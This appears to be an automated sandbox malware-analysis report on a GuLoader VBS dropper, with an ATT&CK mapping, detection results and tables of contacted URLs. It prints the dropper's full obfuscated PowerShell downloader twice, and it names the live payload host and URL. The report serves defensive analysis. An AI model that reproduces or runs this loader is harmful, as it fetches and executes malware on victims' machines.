SConvuacran MisbTip,u ByprFarlnEm ri MednN rogBa.n.al aDKremoun ewP ecnFeldlEggco steaModtdBillF

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $stenternstantiates; function husking($sicklemia){$afmilitariseringers=4;$stenter=$afmilitariseringers;do{$musikgruppens+=$sicklemia[$stenter];$stenter+=5} until(!$sicklemia[$stenter])$musikgruppens}function batiker179($folketingsvalgenes){ .($opsamlingsbeholdernes) ($folketingsvalgenes)}$opsamlingsbeholderens=husking ' trnforsebomut dep.seddw';$opsamlingsbeholderens+=husking ' vuleun.ubkontcin.elpsamisupeeafsknsr ut';$loppier=husking 'bystmdrifo h mz .aainonslevaclun oaabor/';$jalousidramaet=husking 'finttvenll rudsr ff1 bo 2';$mhorr='mid [ rann.nimes yntprst.slagsemboeapanr mpvhelaibecactrefesanspskopobegoi snonchart va,mf ska c tn.ammaind.gforbestyrr q t]lyco:modt:k.imsdisme arecmanou ta r vlgiinortaareyproepsynsryeaso sl tenmao volcltero full ver=d,ed$k.lejkameaedlallayeoand.upressdel,i ketdhoverbragabaadm inta im ee ekt';$loppier+=husking 'fi l5.omm.desp0h ck besk(poliwfraniov rn mocdamfeo onw f,rsl nk kommnkiritesth ,lem1slde0in v.tu n0 muf;omga ostwnondihummnsou 6elsd4 apo;ster pi,fxslag6 va.4nons;vent euour snav gro:hale1 ent3.voi1 ame.bygg0intr)a ve coauganilemenacflarkpostorubi/ kon2tat 0l.co1tell0,bor0snar1bytn0tabu1 sti mecfdemiibundr bile emif fmosporxglau/pref1regi3met.1age .soli0';$nedslidendes=husking '.ontua.ststeleeblepr mes-pedaa colgdes,ebrnen halt';$kjerstines=husking 'arv hforvtopirtblodpmelusorbi:enea/lang/venuoopalfsyst1f ktxhugu.afskiudrac hroufi.d/euphyyu eksoighfartf.edlh frlyfl,scarcaf.igh/ onsghentlkra iha,dabek.do tsiprean conemodesps k.st.lplabof s nb';$unsighted=husking ' met>';$opsamlingsbeholdernes=husking 'pre iselveind x';$besprinkle='libertine';$beskaaret='\unmidwifed.sur';batiker179 (husking 'skum$shilgcit l ek.o grabchriatabel col:horedeghorcwm.y yklahjrnsal.c= ata$ shae fisntypevcest:ua sa.acepo.rypsk kd resaerv tincoapse + obe$heydbvocaetracs ,orktr.pauncoa illrfakteno rt');batiker179 (husking 'agla$a,stgsurml disodirgb linauntrlfred:sprozskkeo albl h raskabeproesononqpaasuodyse scr=is.m$nvnek m,ljafsieskdermilisrh,nt ctuirustnpaleenl.ts,egi.appes di pfumel inditextt w e(.tev$chrouvikinskrisrefiihandg himhtriltdrosev njdasfa)');batiker179 (husking $mhorr);$kjerstines=$zolaesque[0];$unplacement=(husking ' tra$persgsan.l ,erohedeb th a.eselacme:sutsssadeuaftenmodeb bacu ergrtuyendaliiar hnchrog ft=.uttn ,orenumawv lt-uretoga vb vej posedrilcwindtvejv f tesdextyintes,itmtretme fi m fag. sol$supeos qupnonrsbawdaorchmgoo l arci .amn f,ag hrystellbpur.echurhd naoyeell,entd.inse konrre eebrevnsviks');batiker179 ($unplacement);batiker179 (husking 'tes,$,ommsgarduekstninfobs yrukhivr itenpar,idemin.ncegrumi. u.fhdemue.erla st dpersepyrrrcoinskore[slut$marknafdaeshagdtotastrkgll vpishocddo.ueunannsab.dkense udgs fil]fors=phos$solil isoogarnpalloppro,iyel ekoder');$karotiner=husking 'naad$dai sconvuacran misbtip,u byprfarlnem ri mednn rogba.n.al adkremoun ewp ecnfeldleggco steamodtdbillf
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $stenternstantiates; function husking($sicklemia){$afmilitariseringers=4;$stenter=$afmilitariseringers;do{$musikgruppens+=$sicklemia[$stenter];$stenter+=5} until(!$sicklemia[$stenter])$musikgruppens}function batiker179($folketingsvalgenes){ .($opsamlingsbeholdernes) ($folketingsvalgenes)}$opsamlingsbeholderens=husking ' trnforsebomut dep.seddw';$opsamlingsbeholderens+=husking ' vuleun.ubkontcin.elpsamisupeeafsknsr ut';$loppier=husking 'bystmdrifo h mz .aainonslevaclun oaabor/';$jalousidramaet=husking 'finttvenll rudsr ff1 bo 2';$mhorr='mid [ rann.nimes yntprst.slagsemboeapanr mpvhelaibecactrefesanspskopobegoi snonchart va,mf ska c tn.ammaind.gforbestyrr q t]lyco:modt:k.imsdisme arecmanou ta r vlgiinortaareyproepsynsryeaso sl tenmao volcltero full ver=d,ed$k.lejkameaedlallayeoand.upressdel,i ketdhoverbragabaadm inta im ee ekt';$loppier+=husking 'fi l5.omm.desp0h ck besk(poliwfraniov rn mocdamfeo onw f,rsl nk kommnkiritesth ,lem1slde0in v.tu n0 muf;omga ostwnondihummnsou 6elsd4 apo;ster pi,fxslag6 va.4nons;vent euour snav gro:hale1 ent3.voi1 ame.bygg0intr)a ve coauganilemenacflarkpostorubi/ kon2tat 0l.co1tell0,bor0snar1bytn0tabu1 sti mecfdemiibundr bile emif fmosporxglau/pref1regi3met.1age .soli0';$nedslidendes=husking '.ontua.ststeleeblepr mes-pedaa colgdes,ebrnen halt';$kjerstines=husking 'arv hforvtopirtblodpmelusorbi:enea/lang/venuoopalfsyst1f ktxhugu.afskiudrac hroufi.d/euphyyu eksoighfartf.edlh frlyfl,scarcaf.igh/ onsghentlkra iha,dabek.do tsiprean conemodesps k.st.lplabof s nb';$unsighted=husking ' met>';$opsamlingsbeholdernes=husking 'pre iselveind x';$besprinkle='libertine';$beskaaret='\unmidwifed.sur';batiker179 (husking 'skum$shilgcit l ek.o grabchriatabel col:horedeghorcwm.y yklahjrnsal.c= ata$ shae fisntypevcest:ua sa.acepo.rypsk kd resaerv tincoapse + obe$heydbvocaetracs ,orktr.pauncoa illrfakteno rt');batiker179 (husking 'agla$a,stgsurml disodirgb linauntrlfred:sprozskkeo albl h raskabeproesononqpaasuodyse scr=is.m$nvnek m,ljafsieskdermilisrh,nt ctuirustnpaleenl.ts,egi.appes di pfumel inditextt w e(.tev$chrouvikinskrisrefiihandg himhtriltdrosev njdasfa)');batiker179 (husking $mhorr);$kjerstines=$zolaesque[0];$unplacement=(husking ' tra$persgsan.l ,erohedeb th a.eselacme:sutsssadeuaftenmodeb bacu ergrtuyendaliiar hnchrog ft=.uttn ,orenumawv lt-uretoga vb vej posedrilcwindtvejv f tesdextyintes,itmtretme fi m fag. sol$supeos qupnonrsbawdaorchmgoo l arci .amn f,ag hrystellbpur.echurhd naoyeell,entd.inse konrre eebrevnsviks');batiker179 ($unplacement);batiker179 (husking 'tes,$,ommsgarduekstninfobs yrukhivr itenpar,idemin.ncegrumi. u.fhdemue.erla st dpersepyrrrcoinskore[slut$marknafdaeshagdtotastrkgll vpishocddo.ueunannsab.dkense udgs fil]fors=phos$solil isoogarnpalloppro,iyel ekoder');$karotiner=husking 'naad$dai sconvuacran misbtip,u byprfarlnem ri mednn rogba.n.al adkremoun ewp ecnfeldleggco steamodtdbillf			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	321 Scripting	Valid Accounts	2 Command and Scripting Interpreter	321 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Sentinelled.vbs	18%	ReversingLabs	Script-WScript.Trojan.GuLoader

Name	IP	Active	Malicious	Reputation
youtube-ui.l.google.com	142.250.181.110	true	false	high
of1x.icu	104.21.86.72	true	false	unknown
www.youtube.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://of1x.icu/YkHfhYCF/gliadines.pfb	false		unknown
https://www.youtube.com/watch?v=oHg5SJYRHA0	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://csp.withgoogle.com/csp/report-to/youtube_main	powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C5E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8E271000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon.ico	powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/sx_48GeZxhE/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
http://crl.microsoft	powershell.exe, 00000002.00000002.1778189960.000001CBA47F1000.00000004.00000020.00020000.00000000.sdmp	false	high
https://of1x.icu/YkHfhYCF/gliadines.p	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://yt3.ggpht.com/ytc/AIdro_lS37vyjmNzIUpFzRVh1FZm9r8PZ2YbiwbR7YGjmq4ltw=s88-c-k-c0x00ffffff-no-	powershell.exe, 00000002.00000002.1743791119.000001CB8C9D6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp	false	high
https://of1x.icu/YkHfhYCF/gl	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://i.ytimg.com/vi/OeqejfDmO5A/hq720.jpg?sqp=-oaymwEkCJUDENAFSFryq4qpAxYIARUAAAAAJQAAyEI9AICiQ3g	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
http://youtube-ui.l.google.com	powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp	false	high
https://i.ytimg.com/generate_204	powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_48x48.png	powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://of1x.ic	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://of1x.icu/YkHfhYCF/g	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.youtube.com/error_204?t=jserror&level=ERROR	powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://of1x.icu/YkHfhYCF/	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.youtube.com	powershell.exe, 00000002.00000002.1743791119.000001CB8E254000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DE19000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/s/desktop/c01ea7e3/jsbin/intersection-observer.min.vflset/intersection-obser	powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/bs4g_aWu3xk/frame0.jpg	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/qn5lWO39CqM/frame0.jpg	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/-8yWWBQJvx0/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/7rUYHhQHcI4/oardefault.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyE	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://www.youtube.com/s/desktop/c01ea7e3/jsbin/web-animations-next-lite.min.vflset/web-animations-	powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://contoso.com/	powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp	false	high
https://of1x.icu	powershell.exe, 00000002.00000002.1743791119.000001CB8DF78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C366000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.youtube.com/s/desktop/c01ea7e3/jsbin/spf.vflset/spf.js	powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://of1x.icu/YkHfhYCF/glia	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://of1x.icu/YkHfhYCF/gliadin	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://i.ytimg.com/vi/tsgEulFLLks/frame0.jpg	Unmidwifed.Sur.2.dr	false	high
https://of1x.icu/Yk	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1743791119.000001CB8C141000.00000004.00000800.00020000.00000000.sdmp	false	high
https://i.ytimg.com/vi/n5EuaxDzzSg/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_32x32.png	powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp	false	high
https://music.youtube.com/	powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1768862468.000001CB9C150000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://of1x.icu/YkHfhYCF/gli	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://of1x.icu/YkHfhYCF/gliad	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://www.youtube.com	powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp	false	high
https://i.ytimg.com/vi/sx_48GeZxhE/frame0.jpg	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1743791119.000001CB8C366000.00000004.00000800.00020000.00000000.sdmp	false	high
https://of1x.icu/YkH	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://i.ytimg.com/vi/-8yWWBQJvx0/frame0.jpg	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://of1x.i	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1743791119.000001CB8C366000.00000004.00000800.00020000.00000000.sdmp	false	high
https://i.ytimg.com/vi/n5EuaxDzzSg/frame0.jpg	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://music.youtube.com	powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1768862468.000001CB9C150000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://go.micro	powershell.exe, 00000002.00000002.1743791119.000001CB8CADA000.00000004.00000800.00020000.00000000.sdmp	false	high
https://of1x.icu/YkHfhYCF/gliadines	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://of1x.icu/YkHfh	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://of1x.icu/YkHfhYCF/gliadines.pf	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp	false	high
https://i.ytimg.com/vi/G3hdDOaYhrA/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/885Jhvh-Z-I/hq720.jpg?sqp=-oaymwEkCJUDENAFSFryq4qpAxYIARUAAAAAJQAAyEI9AICiQ3g	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://of1x.icu/Y	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_144x144.png	powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://www.youtube.com/s/desktop/c01ea7e3/jsbin/webcomponents-all-noPatch.vflset/webcomponents-all-	powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/yhXUh4EM3uI/frame0.jpg	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/41iWg91yFv0/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi	Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/w35Ck8mcSk0/frame0.jpg	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/w35Ck8mcSk0/hq720.jpg?sqp=-oaymwEkCJUDENAFSFryq4qpAxYIARUAAAAAJQAAyEI9AICiQ3g	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1743791119.000001CB8C366000.00000004.00000800.00020000.00000000.sdmp	false	high
http://support.google.com/accounts/answer/151657?hl=en	powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C5E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8E271000.00000004.00000800.00020000.00000000.sdmp	false	high
https://i.ytimg.com/vi/41iWg91yFv0/frame0.jpg	Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/KUM2p2Weicg/frame0.jpg	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/yhXUh4EM3uI/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/-Rdhra2LM_k/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi	Unmidwifed.Sur.2.dr	false	high
https://of1x.icu/	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://i.ytimg.com/vi/G3hdDOaYhrA/frame0.jpg	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/KUM2p2Weicg/hq720.jpg?sqp=-oaymwEkCJUDENAFSFryq4qpAxYIARUAAAAAJQAAyEI9AICiQ3g	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://of1x.icu/YkHfhYCF/gliadines.	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://crl.micro	powershell.exe, 00000002.00000002.1778189960.000001CBA47F1000.00000004.00000020.00020000.00000000.sdmp	false	high
https://i.ytimg.com/vi/bs4g_aWu3xk/hq720.jpg?sqp=-oaymwEkCJUDENAFSFryq4qpAxYIARUAAAAAJQAAyEI9AICiQ3g	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/tsgEulFLLks/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi	Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/qn5lWO39CqM/hq720.jpg?sqp=-oaymwEkCJUDENAFSFryq4qpAxYIARUAAAAAJQAAyEI9AICiQ3g	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://of1x.icu/YkHfhY	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://of1x.icu/YkHfhYCF/gliadi	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://i.ytimg.com/vi/OeqejfDmO5A/frame0.jpg	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_96x96.png	powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.1743791119.000001CB8C141000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/s/desktop/c01ea7e3/jsbin/fetch-polyfill.vflset/fetch-polyfill.js	powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/-Rdhra2LM_k/frame0.jpg	Unmidwifed.Sur.2.dr	false	high
https://of1x.icu/YkHfhYC	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://of1x.icu/YkHfhYCF/gliadine	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
